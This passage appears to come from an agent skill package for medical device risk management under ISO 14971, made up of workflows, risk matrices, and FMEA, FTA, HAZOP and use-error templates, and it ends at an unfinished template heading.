See: [references/risk-analysis-methods.md](references/risk-analysis-methods.md)
---
## Risk Evaluation Workflow
Evaluate risks against acceptability criteria.
### Workflow: Evaluate Identified Risks
1. Calculate initial risk level from probability × severity
2. Compare to risk acceptability criteria
3. For each risk, determine:
- Acceptable: Document and accept
- ALARP: Proceed to risk control
- Unacceptable: Mandatory risk control
4. Document evaluation rationale
5. Identify risks requiring benefit-risk analysis
6. Complete benefit-risk analysis if applicable
7. Compile risk evaluation summary
8. **Validation:** All risks evaluated; acceptability determined; rationale documented
### Risk Evaluation Decision Tree
```
Risk Estimated
│
▼
Apply Acceptability Criteria
│
├── Low Risk ──────────► Accept and document
│
├── Medium Risk ───────► Consider risk reduction
│ │ Document ALARP if not reduced
│ ▼
│ Practicable to reduce?
│ │
│ Yes──► Implement control
│ No───► Document ALARP rationale
│
├── High Risk ─────────► Risk reduction required
│ │ Must demonstrate ALARP
│ ▼
│ Implement control
│ Verify residual risk
│
└── Unacceptable ──────► Design change mandatory
Cannot proceed without control
```
### ALARP Demonstration Requirements
| Criterion | Evidence Required |
|-----------|-------------------|
| Technical feasibility | Analysis of alternative controls |
| Proportionality | Cost-benefit of further reduction |
| State of the art | Comparison to similar devices |
| Stakeholder input | Clinical/user perspectives |
### Benefit-Risk Analysis Triggers
| Situation | Benefit-Risk Required |
|-----------|----------------------|
| Residual risk remains high | Yes |
| No feasible risk reduction | Yes |
| Novel device | Yes |
| Unacceptable risk with clinical benefit | Yes |
| All risks low | No |
---
## Risk Control Workflow
Implement and verify risk control measures.
### Workflow: Implement Risk Controls
1. Identify risk control options:
- Inherent safety by design (Priority 1)
- Protective measures in device (Priority 2)
- Information for safety (Priority 3)
2. Select optimal control following hierarchy
3. Analyze control for new hazards introduced
4. Document control in design requirements
5. Implement control in design
6. Develop verification protocol
7. Execute verification and document results
8. Evaluate residual risk with control in place
9. **Validation:** Control implemented; verification passed; residual risk acceptable; no unaddressed new hazards
### Risk Control Hierarchy
| Priority | Control Type | Examples | Effectiveness |
|----------|--------------|----------|---------------|
| 1 | Inherent Safety | Eliminate hazard, fail-safe design | Highest |
| 2 | Protective Measures | Guards, alarms, automatic shutdown | High |
| 3 | Information | Warnings, training, IFU | Lower |
### Risk Control Option Analysis Template
```
RISK CONTROL OPTION ANALYSIS
Hazard ID: H-[XXX]
Hazard: [Description]
Initial Risk: P[X] × S[X] = [Level]
OPTIONS CONSIDERED:
| Option | Control Type | New Hazards | Feasibility | Selected |
|--------|--------------|-------------|-------------|----------|
| 1 | [Type] | [Yes/No] | [H/M/L] | [Yes/No] |
| 2 | [Type] | [Yes/No] | [H/M/L] | [Yes/No] |
SELECTED CONTROL: Option [X]
Rationale: [Justification for selection]
IMPLEMENTATION:
- Requirement: [REQ-XXX]
- Design Document: [Reference]
VERIFICATION:
- Method: [Test/Analysis/Review]
- Protocol: [Reference]
- Acceptance Criteria: [Criteria]
```
### Risk Control Verification Methods
| Method | When to Use | Evidence |
|--------|-------------|----------|
| Test | Quantifiable performance | Test report |
| Inspection | Physical presence | Inspection record |
| Analysis | Design calculation | Analysis report |
| Review | Documentation check | Review record |
### Residual Risk Evaluation
| After Control | Action |
|---------------|--------|
| Acceptable | Document, proceed |
| ALARP achieved | Document rationale, proceed |
| Still unacceptable | Additional control or design change |
| New hazard introduced | Analyze and control new hazard |
---
## Post-Production Risk Management
Monitor and update risk management throughout product lifecycle.
### Workflow: Post-Production Risk Monitoring
1. Identify information sources:
- Customer complaints
- Service reports
- Vigilance/adverse events
- Literature monitoring
- Clinical studies
2. Establish collection procedures
3. Define review triggers:
- New hazard identified
- Increased frequency of known hazard
- Serious incident
- Regulatory feedback
4. Analyze incoming information for risk relevance
5. Update risk management file as needed
6. Communicate significant findings
7. Conduct periodic risk management review
8. **Validation:** Information sources monitored; file current; reviews completed per schedule
### Information Sources
| Source | Information Type | Review Frequency |
|--------|------------------|------------------|
| Complaints | Use issues, failures | Continuous |
| Service | Field failures, repairs | Monthly |
| Vigilance | Serious incidents | Immediate |
| Literature | Similar device issues | Quarterly |
| Regulatory | Authority feedback | As received |
| Clinical | PMCF data | Per plan |
### Risk Management File Update Triggers
| Trigger | Response Time | Action |
|---------|---------------|--------|
| Serious incident | Immediate | Full risk review |
| New hazard identified | 30 days | Risk analysis update |
| Trend increase | 60 days | Trend analysis |
| Design change | Before implementation | Impact assessment |
| Standards update | Per transition period | Gap analysis |
### Periodic Review Requirements
| Review Element | Frequency |
|----------------|-----------|
| Risk management file completeness | Annual |
| Risk control effectiveness | Annual |
| Post-market information analysis | Quarterly |
| Risk-benefit conclusions | Annual or on new data |
---
## Risk Assessment Templates
→ See references/risk-assessment-templates.md for details
## Decision Frameworks
### Risk Control Selection
```
What is the risk level?
│
├── Unacceptable ──► Can hazard be eliminated?
│ │
│ Yes─┴─No
│ │ │
│ ▼ ▼
│ Eliminate Can protective
│ hazard measure reduce?
│ │
│ Yes─┴─No
│ │ │
│ ▼ ▼
│ Add Add warning
│ protection + training
│
└── High/Medium ──► Apply hierarchy
starting at Level 1
```
### New Hazard Analysis
| Question | If Yes | If No |
|----------|--------|-------|
| Does control introduce new hazard? | Analyze new hazard | Proceed |
| Is new risk higher than original? | Reject control option | Acceptable trade-off |
| Can new hazard be controlled? | Add control | Reject control option |
### Risk Acceptability Decision
| Condition | Decision |
|-----------|----------|
| All risks Low | Acceptable |
| Medium risks with ALARP | Acceptable |
| High risks with ALARP documented | Acceptable if benefits outweigh |
| Any Unacceptable residual | Not acceptable - redesign |
---
## Tools and References
### Scripts
| Tool | Purpose | Usage |
|------|---------|-------|
| [risk_matrix_calculator.py](scripts/risk_matrix_calculator.py) | Calculate risk levels and FMEA RPN | `python risk_matrix_calculator.py --help` |
**Risk Matrix Calculator Features:**
- ISO 14971 5x5 risk matrix calculation
- FMEA RPN (Risk Priority Number) calculation
- Interactive mode for guided assessment
- Display risk criteria definitions
- JSON output for integration
### References
| Document | Content |
|----------|---------|
| [iso14971-implementation-guide.md](references/iso14971-implementation-guide.md) | Complete ISO 14971:2019 implementation with templates |
| [risk-analysis-methods.md](references/risk-analysis-methods.md) | FMEA, FTA, HAZOP, Use Error Analysis methods |
### Quick Reference: ISO 14971 Process
| Stage | Key Activities | Output |
|-------|----------------|--------|
| Planning | Define scope, criteria, responsibilities | Risk Management Plan |
| Analysis | Identify hazards, estimate risk | Hazard Analysis |
| Evaluation | Compare to criteria, ALARP assessment | Risk Evaluation |
| Control | Implement hierarchy, verify | Risk Control Records |
| Residual | Overall assessment, benefit-risk | Risk Management Report |
| Production | Monitor, review, update | Updated RM File |
---
## Related Skills
| Skill | Integration Point |
|-------|-------------------|
| [quality-manager-qms-iso13485](../quality-manager-qms-iso13485/) | QMS integration |
| [capa-officer](../capa-officer/) | Risk-based CAPA |
| [regulatory-affairs-head](../regulatory-affairs-head/) | Regulatory submissions |
| [quality-documentation-manager](../quality-documentation-manager/) | Risk file management |
FILE:references/iso14971-implementation-guide.md
# ISO 14971:2019 Implementation Guide
Complete implementation framework for medical device risk management per ISO 14971:2019.
---
## Table of Contents
- [Risk Management Planning](#risk-management-planning)
- [Risk Analysis](#risk-analysis)
- [Risk Evaluation](#risk-evaluation)
- [Risk Control](#risk-control)
- [Overall Residual Risk Evaluation](#overall-residual-risk-evaluation)
- [Risk Management Report](#risk-management-report)
- [Production and Post-Production Activities](#production-and-post-production-activities)
---
## Risk Management Planning
### Risk Management Plan Content
| Element | Requirement | Documentation |
|---------|-------------|---------------|
| Scope | Medical device and lifecycle stages covered | Scope statement |
| Responsibilities | Personnel and authority assignments | Organization chart, RACI |
| Review Requirements | Timing and triggers for reviews | Review schedule |
| Acceptability Criteria | Risk acceptance matrix and policy | Risk acceptability criteria |
| Verification Activities | Methods for control verification | Verification plan |
| Production/Post-Production | Activities for ongoing risk management | Surveillance plan |
### Risk Management Plan Template
```
RISK MANAGEMENT PLAN
Document Number: RMP-[Product]-[Rev]
Product: [Device Name]
Revision: [X.X]
Effective Date: [Date]
1. SCOPE AND PURPOSE
1.1 Medical Device Description: [Description]
1.2 Intended Use: [Statement]
1.3 Lifecycle Stages Covered: [Design/Production/Post-Market]
1.4 Plan Objectives: [Objectives]
2. RESPONSIBILITIES AND AUTHORITIES
| Role | Responsibility | Authority |
|------|----------------|-----------|
| Risk Management Lead | Overall RM process | RM decisions |
| Design Engineer | Risk identification | Design changes |
| QA Manager | RM file review | File approval |
| Clinical | Clinical input | Clinical risk assessment |
3. RISK ACCEPTABILITY CRITERIA
3.1 Risk Matrix: [Reference to matrix]
3.2 Acceptability Policy: [Acceptable/ALARP/Unacceptable definitions]
3.3 Benefit-Risk Considerations: [When applicable]
4. VERIFICATION ACTIVITIES
4.1 Risk Control Verification Methods: [Test, Analysis, Review]
4.2 Verification Timing: [Design phase, V&V]
4.3 Acceptance Criteria: [Pass/fail criteria]
5. PRODUCTION AND POST-PRODUCTION
5.1 Information Collection: [Sources]
5.2 Review Triggers: [Events requiring review]
5.3 Update Process: [RM file update procedure]
6. REVIEW AND APPROVAL
Prepared By: _________________ Date: _______
Reviewed By: _________________ Date: _______
Approved By: _________________ Date: _______
```
### Risk Acceptability Criteria Definition
| Risk Level | Definition | Action Required |
|------------|------------|-----------------|
| Broadly Acceptable | Risk so low that no action needed | Document and monitor |
| ALARP (Tolerable) | Risk reduced as low as reasonably practicable | Verify ALARP, consider benefit |
| Unacceptable | Risk exceeds acceptable threshold | Risk control mandatory |
### Risk Matrix Example (5x5)
| Probability \ Severity | Negligible | Minor | Serious | Critical | Catastrophic |
|------------------------|------------|-------|---------|----------|--------------|
| Frequent | Medium | High | High | Unacceptable | Unacceptable |
| Probable | Low | Medium | High | High | Unacceptable |
| Occasional | Low | Medium | Medium | High | High |
| Remote | Low | Low | Medium | Medium | High |
| Improbable | Low | Low | Low | Medium | Medium |
**Risk Level Actions:**
- **Low (Acceptable):** Document, no action required
- **Medium (ALARP):** Consider risk reduction, document rationale
- **High (ALARP):** Risk reduction required unless ALARP demonstrated
- **Unacceptable:** Risk reduction mandatory before proceeding
---
## Risk Analysis
### Hazard Identification Methods
| Method | Application | Standard Reference |
|--------|-------------|-------------------|
| FMEA | Component/subsystem failures | IEC 60812 |
| FTA | System-level failure analysis | IEC 61025 |
| HAZOP | Process hazard identification | IEC 61882 |
| PHA | Preliminary hazard assessment | - |
| Use FMEA | Use-related hazards | IEC 62366-1 |
### Intended Use Analysis Checklist
| Category | Questions to Address |
|----------|---------------------|
| Medical Purpose | What condition is treated/diagnosed? |
| Patient Population | Age, health status, contraindications? |
| User Population | Healthcare professional, patient, caregiver? |
| Use Environment | Hospital, home, ambulatory? |
| Duration | Single use, repeated, continuous? |
| Body Contact | External, internal, implanted? |
### Hazard Categories (Informative Annex C)
| Category | Examples |
|----------|----------|
| Energy | Electrical, thermal, mechanical, radiation |
| Biological | Bioburden, pyrogens, biocompatibility |
| Chemical | Residues, degradation products, leachables |
| Operational | Incorrect output, delayed function, unexpected operation |
| Information | Incomplete instructions, inadequate warnings |
| Use Environment | Electromagnetic, mechanical stress |
### Hazardous Situation Documentation
```
HAZARD ANALYSIS WORKSHEET
Product: [Device Name]
Analyst: [Name]
Date: [Date]
| ID | Hazard | Hazardous Situation | Sequence of Events | Harm | P1 | P2 | Initial Risk |
|----|--------|--------------------|--------------------|------|----|----|--------------|
| H-001 | [Hazard] | [Situation] | [Sequence] | [Harm] | [Prob] | [Sev] | [Level] |
P1 = Probability of hazardous situation occurring
P2 = Probability of harm given hazardous situation
Initial Risk = Risk before controls
```
### Risk Estimation
**Probability Categories:**
| Level | Term | Definition | Frequency |
|-------|------|------------|-----------|
| 5 | Frequent | Expected to occur | >10⁻³ |
| 4 | Probable | Likely to occur | 10⁻³ to 10⁻⁴ |
| 3 | Occasional | May occur | 10⁻⁴ to 10⁻⁵ |
| 2 | Remote | Unlikely to occur | 10⁻⁵ to 10⁻⁶ |
| 1 | Improbable | Very unlikely | <10⁻⁶ |
**Severity Categories:**
| Level | Term | Definition | Patient Impact |
|-------|------|------------|----------------|
| 5 | Catastrophic | Results in death | Death |
| 4 | Critical | Results in permanent impairment | Permanent impairment |
| 3 | Serious | Results in injury requiring intervention | Injury requiring treatment |
| 2 | Minor | Results in temporary injury | Temporary discomfort |
| 1 | Negligible | Inconvenience or temporary discomfort | No injury |
---
## Risk Evaluation
### Evaluation Workflow
1. Apply risk acceptability criteria to estimated risk
2. Determine if risk is acceptable, ALARP, or unacceptable
3. For ALARP risks, document ALARP demonstration
4. For unacceptable risks, proceed to risk control
5. Document evaluation rationale
6. **Validation:** All risks evaluated against criteria; rationale documented
### Risk Acceptability Decision
| Initial Risk | Benefit Available | Decision |
|--------------|-------------------|----------|
| Acceptable | N/A | Accept, document |
| ALARP | No | Verify ALARP |
| ALARP | Yes | Include in benefit-risk |
| Unacceptable | No | Design change required |
| Unacceptable | Yes | Benefit-risk analysis |
### ALARP Demonstration
| Criterion | Evidence Required |
|-----------|-------------------|
| Technical feasibility | Analysis of alternatives |
| Economic proportionality | Cost-benefit assessment |
| State of the art | Review of similar devices |
| User acceptance | Stakeholder input |
---
## Risk Control
### Risk Control Hierarchy
| Priority | Control Type | Examples |
|----------|--------------|----------|
| 1 | Inherent safety by design | Remove hazard, substitute material |
| 2 | Protective measures in device | Guards, alarms, software limits |
| 3 | Information for safety | Warnings, training, IFU |
### Risk Control Option Analysis
```
RISK CONTROL OPTION ANALYSIS
Hazard ID: [H-XXX]
Risk Level: [Unacceptable/High]
| Option | Control Type | Effectiveness | Feasibility | New Risks | Selected |
|--------|--------------|---------------|-------------|-----------|----------|
| Option 1 | [Type] | [H/M/L] | [H/M/L] | [Yes/No] | [Yes/No] |
| Option 2 | [Type] | [H/M/L] | [H/M/L] | [Yes/No] | [Yes/No] |
Selected Option: [Option X]
Rationale: [Justification]
```
### Risk Control Implementation Record
```
RISK CONTROL IMPLEMENTATION
Control ID: RC-[XXX]
Related Hazard: H-[XXX]
Control Description: [Description]
Control Type: [ ] Inherent Safety [ ] Protective Measure [ ] Information
Implementation:
- Specification/Requirement: [Reference]
- Design Document: [Reference]
- Verification Method: [Test/Analysis/Review]
- Verification Criteria: [Pass criteria]
Verification:
- Protocol Reference: [Document]
- Execution Date: [Date]
- Result: [ ] Pass [ ] Fail
- Evidence Reference: [Document]
New Risks Introduced: [ ] Yes [ ] No
If Yes: [New Hazard ID references]
Residual Risk:
- P1: [Probability]
- P2: [Severity]
- Residual Risk Level: [Level]
Approved By: _________________ Date: _______
```
### Risk Control Verification Methods
| Method | Application | Evidence |
|--------|-------------|----------|
| Test | Quantifiable control effectiveness | Test report |
| Inspection | Physical control presence | Inspection record |
| Analysis | Design analysis confirmation | Analysis report |
| Review | Document/drawing review | Review record |
---
## Overall Residual Risk Evaluation
### Evaluation Process
1. Compile all individual residual risks
2. Consider cumulative effects of residual risks
3. Assess overall residual risk acceptability
4. Conduct benefit-risk analysis if required
5. Document overall evaluation conclusion
6. **Validation:** All residual risks compiled; overall evaluation complete
### Benefit-Risk Analysis
| Factor | Assessment |
|--------|------------|
| Clinical Benefit | Documented therapeutic benefit |
| State of the Art | Comparison to alternative treatments |
| Patient Expectation | Benefit patient would accept |
| Medical Opinion | Clinical expert input |
| Risk Quantification | Residual risk characterization |
### Benefit-Risk Documentation
```
BENEFIT-RISK ANALYSIS
Product: [Device Name]
Date: [Date]
BENEFITS:
1. Primary Clinical Benefit: [Description]
- Evidence: [Reference]
- Magnitude: [Quantification]
2. Secondary Benefits: [List]
RISKS:
1. Residual Risks Summary:
| Risk Category | Count | Highest Level |
|---------------|-------|---------------|
| Acceptable | [N] | Low |
| ALARP | [N] | Medium/High |
2. Cumulative Considerations: [Assessment]
COMPARISON:
- State of the Art: [How device compares]
- Alternative Treatments: [Risk comparison]
- Patient Acceptance: [Expected acceptance]
CONCLUSION:
[ ] Benefits outweigh risks - Acceptable
[ ] Benefits do not outweigh risks - Not Acceptable
Rationale: [Justification]
Approved By: _________________ Date: _______
```
---
## Risk Management Report
### Report Content Requirements
| Section | Content |
|---------|---------|
| Results of Risk Analysis | Summary of hazards and risks identified |
| Risk Control Decisions | Controls selected and implemented |
| Overall Residual Risk | Evaluation and acceptability conclusion |
| Benefit-Risk Conclusion | If applicable |
| Review and Approval | Formal sign-off |
### Risk Management Report Template
```
RISK MANAGEMENT REPORT
Document Number: RMR-[Product]-[Rev]
Product: [Device Name]
Date: [Date]
1. EXECUTIVE SUMMARY
- Total hazards identified: [N]
- Risk controls implemented: [N]
- Residual risks: [N] acceptable, [N] ALARP
- Overall conclusion: [Acceptable/Not Acceptable]
2. RISK ANALYSIS SUMMARY
- Methods used: [FMEA, FTA, etc.]
- Scope coverage: [Lifecycle stages]
- Hazard categories addressed: [List]
3. RISK EVALUATION SUMMARY
| Risk Level | Before Control | After Control |
|------------|----------------|---------------|
| Unacceptable | [N] | [N] |
| High | [N] | [N] |
| Medium | [N] | [N] |
| Low | [N] | [N] |
4. RISK CONTROL SUMMARY
- Inherent safety controls: [N]
- Protective measures: [N]
- Information for safety: [N]
- All controls verified: [Yes/No]
5. OVERALL RESIDUAL RISK
- Individual residual risks: [Summary]
- Cumulative assessment: [Conclusion]
- Acceptability: [Acceptable/ALARP demonstrated]
6. BENEFIT-RISK ANALYSIS (if applicable)
- Conclusion: [Statement]
7. PRODUCTION AND POST-PRODUCTION
- Monitoring plan: [Reference]
- Review triggers: [List]
8. CONCLUSION
[Statement of overall risk acceptability]
9. APPROVAL
Risk Management Lead: _________________ Date: _______
Quality Assurance: _________________ Date: _______
Management Representative: _________________ Date: _______
```
---
## Production and Post-Production Activities
### Information Sources
| Source | Information Type | Review Frequency |
|--------|------------------|------------------|
| Complaints | Use-related issues, failures | Continuous |
| Service Reports | Field failures, repairs | Monthly |
| Vigilance Reports | Serious incidents | Immediate |
| Literature | Similar device issues | Quarterly |
| Regulatory Feedback | Authority communications | As received |
| Clinical Data | Post-market clinical follow-up | Per PMCF plan |
### Risk Management File Update Triggers
| Trigger | Action Required |
|---------|-----------------|
| New hazard identified | Risk analysis update |
| Control failure | Risk control reassessment |
| Serious incident | Immediate risk review |
| Design change | Impact assessment |
| Standards update | Compliance review |
| Regulatory feedback | Risk evaluation update |
### Risk Management Review Record
```
RISK MANAGEMENT REVIEW RECORD
Review Date: [Date]
Review Type: [ ] Periodic [ ] Triggered
Trigger (if applicable): [Description]
INFORMATION REVIEWED:
| Source | Period | Findings |
|--------|--------|----------|
| Complaints | [Period] | [Summary] |
| Vigilance | [Period] | [Summary] |
| Literature | [Period] | [Summary] |
RISK MANAGEMENT FILE STATUS:
- Current and complete: [ ] Yes [ ] No
- Updates required: [ ] Yes [ ] No
ACTIONS:
| Action | Owner | Due Date |
|--------|-------|----------|
| [Action 1] | [Name] | [Date] |
CONCLUSION:
[ ] No changes to risk profile
[ ] Risk profile updated - see [Document Reference]
[ ] Further investigation required
Reviewed By: _________________ Date: _______
```
FILE:references/risk-analysis-methods.md
# Risk Analysis Methods
Systematic techniques for hazard identification and risk analysis in medical device development.
---
## Table of Contents
- [Method Selection Guide](#method-selection-guide)
- [FMEA - Failure Mode and Effects Analysis](#fmea---failure-mode-and-effects-analysis)
- [FTA - Fault Tree Analysis](#fta---fault-tree-analysis)
- [HAZOP - Hazard and Operability Study](#hazop---hazard-and-operability-study)
- [Use Error Analysis](#use-error-analysis)
- [Software Hazard Analysis](#software-hazard-analysis)
---
## Method Selection Guide
### Method Application Matrix
| Method | Best For | Standard | Complexity |
|--------|----------|----------|------------|
| FMEA | Component/process failures | IEC 60812 | Medium |
| FTA | System-level failure analysis | IEC 61025 | High |
| HAZOP | Process deviations | IEC 61882 | Medium |
| PHA | Early hazard screening | - | Low |
| Use FMEA | Use-related hazards | IEC 62366-1 | Medium |
| STPA | Software/system interactions | - | High |
### Selection Decision Tree
```
What is the analysis focus?
│
├── Component failures → FMEA
│
├── System-level failure → FTA
│
├── Process deviations → HAZOP
│
├── User interaction → Use Error Analysis
│
└── Software behavior → Software FMEA/STPA
```
### When to Use Each Method
| Project Phase | Recommended Methods |
|---------------|---------------------|
| Concept | PHA, initial FTA |
| Design | FMEA, detailed FTA |
| Development | Use Error Analysis, Software HA |
| Verification | FMEA review, FTA validation |
| Production | Process FMEA |
| Post-Market | Trend analysis, FMEA updates |
---
## FMEA - Failure Mode and Effects Analysis
### FMEA Overview
| Aspect | Description |
|--------|-------------|
| Purpose | Identify potential failure modes and their effects |
| Approach | Bottom-up analysis from component to system |
| Output | Failure mode list with severity, occurrence, detection ratings |
| Standard | IEC 60812 |
### FMEA Process Workflow
1. Define scope and system boundaries
2. Develop functional block diagram
3. Identify failure modes for each component/function
4. Determine effects of each failure mode (local, next level, end)
5. Assign severity rating
6. Identify potential causes
7. Assign occurrence rating
8. Identify current controls (detection)
9. Assign detection rating
10. Calculate Risk Priority Number (RPN) or use risk matrix
11. Determine actions for high-priority items
12. **Validation:** All components analyzed; RPNs calculated; actions assigned for high risks
### FMEA Worksheet Template
```
FMEA WORKSHEET
Product: [Device Name]
Subsystem: [Subsystem]
FMEA Lead: [Name]
Date: [Date]
| ID | Item/Function | Failure Mode | Effect (Local) | Effect (End) | S | Cause | O | Controls | D | RPN | Action |
|----|---------------|--------------|----------------|--------------|---|-------|---|----------|---|-----|--------|
| FM-001 | [Item] | [Mode] | [Local Effect] | [End Effect] | [1-10] | [Cause] | [1-10] | [Detection] | [1-10] | [S×O×D] | [Action] |
S = Severity (1=None, 10=Catastrophic)
O = Occurrence (1=Remote, 10=Frequent)
D = Detection (1=Certain, 10=Cannot Detect)
RPN = Risk Priority Number
```
### Severity Rating Scale
| Rating | Severity | Criteria |
|--------|----------|----------|
| 10 | Hazardous | Death or regulatory non-compliance |
| 9 | Serious | Serious injury, major function loss |
| 8 | Major | Significant injury, major inconvenience |
| 7 | High | Minor injury, significant inconvenience |
| 6 | Moderate | Discomfort, partial function loss |
| 5 | Low | Some performance loss |
| 4 | Very Low | Minor performance degradation |
| 3 | Minor | Noticeable effect, no function loss |
| 2 | Very Minor | Negligible effect |
| 1 | None | No effect |
### Occurrence Rating Scale
| Rating | Occurrence | Probability |
|--------|------------|-------------|
| 10 | Almost Certain | >1 in 2 |
| 9 | Very High | 1 in 3 |
| 8 | High | 1 in 8 |
| 7 | Moderately High | 1 in 20 |
| 6 | Moderate | 1 in 80 |
| 5 | Low | 1 in 400 |
| 4 | Very Low | 1 in 2,000 |
| 3 | Remote | 1 in 15,000 |
| 2 | Very Remote | 1 in 150,000 |
| 1 | Nearly Impossible | <1 in 1,500,000 |
### Detection Rating Scale
| Rating | Detection | Likelihood of Detection |
|--------|-----------|------------------------|
| 10 | Absolute Uncertainty | Cannot detect |
| 9 | Very Remote | Very remote chance |
| 8 | Remote | Remote chance |
| 7 | Very Low | Very low chance |
| 6 | Low | Low chance |
| 5 | Moderate | Moderate chance |
| 4 | Moderately High | Moderately high chance |
| 3 | High | High chance |
| 2 | Very High | Very high chance |
| 1 | Almost Certain | Will detect |
### RPN Action Thresholds
| RPN Range | Priority | Action |
|-----------|----------|--------|
| >200 | Critical | Immediate action required |
| 100-200 | High | Action plan required |
| 50-100 | Medium | Consider action |
| <50 | Low | Monitor |
---
## FTA - Fault Tree Analysis
### FTA Overview
| Aspect | Description |
|--------|-------------|
| Purpose | Determine combinations of events leading to top event |
| Approach | Top-down deductive analysis |
| Output | Fault tree diagram with cut sets |
| Standard | IEC 61025 |
### FTA Process Workflow
1. Define top event (undesired system state)
2. Identify immediate causes using logic gates
3. Continue decomposition to basic events
4. Draw fault tree diagram
5. Identify cut sets (combinations causing top event)
6. Calculate probability if quantitative analysis required
7. Identify single points of failure
8. **Validation:** All branches complete; cut sets identified; single points documented
### Fault Tree Symbols
| Symbol | Name | Meaning |
|--------|------|---------|
| Rectangle | Intermediate Event | Event resulting from other events |
| Circle | Basic Event | Primary event, no further development |
| Diamond | Undeveloped Event | Not analyzed further |
| House | House Event | Event expected to occur (condition) |
| AND Gate | AND | All inputs required for output |
| OR Gate | OR | Any input causes output |
### FTA Worksheet Template
```
FAULT TREE ANALYSIS
Top Event: [Description of undesired state]
System: [System name]
Analyst: [Name]
Date: [Date]
BASIC EVENTS:
| ID | Event | Description | Probability | Control |
|----|-------|-------------|-------------|---------|
| BE-001 | [Event] | [Description] | [P] | [Control] |
CUT SETS:
| Cut Set | Events | Order | Probability |
|---------|--------|-------|-------------|
| CS-001 | BE-001 | 1 | [P] |
| CS-002 | BE-001, BE-002 | 2 | [P] |
SINGLE POINTS OF FAILURE:
| Event | Risk | Mitigation |
|-------|------|------------|
| [Event] | [Risk assessment] | [Mitigation strategy] |
```
### Cut Set Analysis
| Cut Set Order | Meaning | Criticality |
|---------------|---------|-------------|
| First Order | Single event causes top event | Highest - single point of failure |
| Second Order | Two events required | High |
| Third Order | Three events required | Moderate |
| Higher Order | Four+ events required | Lower |
---
## HAZOP - Hazard and Operability Study
### HAZOP Overview
| Aspect | Description |
|--------|-------------|
| Purpose | Identify deviations from intended operation |
| Approach | Systematic examination using guide words |
| Output | Deviation analysis with consequences and safeguards |
| Standard | IEC 61882 |
### HAZOP Guide Words
| Guide Word | Meaning | Example Application |
|------------|---------|---------------------|
| NO/NOT | Complete negation | No flow, no signal |
| MORE | Quantitative increase | More pressure, more current |
| LESS | Quantitative decrease | Less flow, less voltage |
| AS WELL AS | Qualitative increase | Extra component, contamination |
| PART OF | Qualitative decrease | Missing component |
| REVERSE | Logical opposite | Reverse flow, reverse polarity |
| OTHER THAN | Complete substitution | Wrong material, wrong signal |
| EARLY | Time-related | Early activation |
| LATE | Time-related | Delayed response |
### HAZOP Process Workflow
1. Select study node (process section or component)
2. Describe design intent for the node
3. Apply guide words to identify deviations
4. Determine causes of each deviation
5. Assess consequences
6. Identify existing safeguards
7. Recommend actions if needed
8. **Validation:** All nodes analyzed; all guide words applied; actions assigned
### HAZOP Worksheet Template
```
HAZOP WORKSHEET
System: [System Name]
Node: [Node Description]
Design Intent: [What the node is supposed to do]
Team Lead: [Name]
Date: [Date]
| Guide Word | Deviation | Causes | Consequences | Safeguards | Actions |
|------------|-----------|--------|--------------|------------|---------|
| NO | [No + parameter] | [Causes] | [Consequences] | [Existing] | [Recommendations] |
| MORE | [More + parameter] | [Causes] | [Consequences] | [Existing] | [Recommendations] |
| LESS | [Less + parameter] | [Causes] | [Consequences] | [Existing] | [Recommendations] |
```
---
## Use Error Analysis
### Use Error Analysis Overview
| Aspect | Description |
|--------|-------------|
| Purpose | Identify use-related hazards and mitigations |
| Approach | Task analysis combined with error prediction |
| Output | Use error list with risk controls |
| Standard | IEC 62366-1 |
### Use Error Categories
| Category | Description | Examples |
|----------|-------------|----------|
| Perception Error | Failure to perceive information | Missing alarm, unclear display |
| Cognition Error | Failure to understand | Misinterpretation, wrong decision |
| Action Error | Incorrect physical action | Wrong button, slip, lapse |
| Memory Error | Failure to recall | Forgotten step, omission |
### Use Error Analysis Process
1. Identify user tasks and subtasks
2. Identify potential use errors for each task
3. Determine consequences of each use error
4. Estimate probability of use error
5. Identify design features contributing to error
6. Define risk control measures
7. Verify control effectiveness
8. **Validation:** All critical tasks analyzed; errors identified; controls defined
### Use Error Worksheet Template
```
USE ERROR ANALYSIS
Device: [Device Name]
Task: [Task Description]
User: [User Profile]
Analyst: [Name]
Date: [Date]
| Step | User Action | Potential Use Error | Error Type | Cause | Consequence | S | P | Risk | Control |
|------|-------------|--------------------| -----------|-------|-------------|---|---|------|---------|
| 1 | [Action] | [Error] | [Type] | [Cause] | [Harm] | [S] | [P] | [Level] | [Control] |
Error Types: Perception (P), Cognition (C), Action (A), Memory (M)
```
### Human Factors Risk Controls
| Control Type | Examples |
|--------------|----------|
| Design | Forcing functions, constraints, affordances |
| Feedback | Visual, auditory, tactile confirmation |
| Labeling | Clear instructions, warnings, symbols |
| Training | User education, competency verification |
| Environment | Adequate lighting, noise reduction |
---
## Software Hazard Analysis
### Software Hazard Analysis Overview
| Aspect | Description |
|--------|-------------|
| Purpose | Identify software contribution to hazards |
| Approach | Analysis of software failure modes and behaviors |
| Output | Software hazard list with safety requirements |
| Standard | IEC 62304 |
### Software Safety Classification
| Class | Contribution to Hazard | Rigor Required |
|-------|------------------------|----------------|
| A | No contribution possible | Basic |
| B | Non-serious injury possible | Moderate |
| C | Death or serious injury possible | High |
### Software Hazard Categories
| Category | Description | Examples |
|----------|-------------|----------|
| Omission | Required function not performed | Missing safety check |
| Commission | Incorrect function performed | Wrong calculation |
| Timing | Function at wrong time | Delayed alarm |
| Value | Function with wrong value | Incorrect dose |
| Sequence | Functions in wrong order | Steps reversed |
### Software FMEA Worksheet
```
SOFTWARE FMEA
Software Item: [Module/Function Name]
Safety Class: [A/B/C]
Analyst: [Name]
Date: [Date]
| ID | Function | Failure Mode | Cause | Effect on System | Effect on Patient | S | P | Risk | Mitigation |
|----|----------|--------------|-------|------------------|-------------------|---|---|------|------------|
| SW-001 | [Function] | [Mode] | [Cause] | [System effect] | [Patient effect] | [S] | [P] | [Level] | [Control] |
Failure Mode Types: Omission, Commission, Timing, Value, Sequence
```
### Software Risk Controls
| Control Type | Implementation |
|--------------|----------------|
| Defensive Programming | Input validation, range checking |
| Error Handling | Exception handling, graceful degradation |
| Redundancy | Dual channels, voting logic |
| Watchdog | Timeout monitoring, heartbeat |
| Self-Test | Power-on diagnostics, runtime checks |
| Separation | Independence of safety functions |
### Traceability Requirements
| From | To | Purpose |
|------|------|---------|
| Software Hazard | Software Requirement | Hazard addressed |
| Software Requirement | Architecture | Requirement implemented |
| Architecture | Code | Design realized |
| Code | Test | Verification coverage |
| Test | Hazard | Control verified |
FILE:references/risk-assessment-templates.md
# risk-management-specialist reference
## Risk Assessment Templates
### Hazard Analysis Worksheet
```
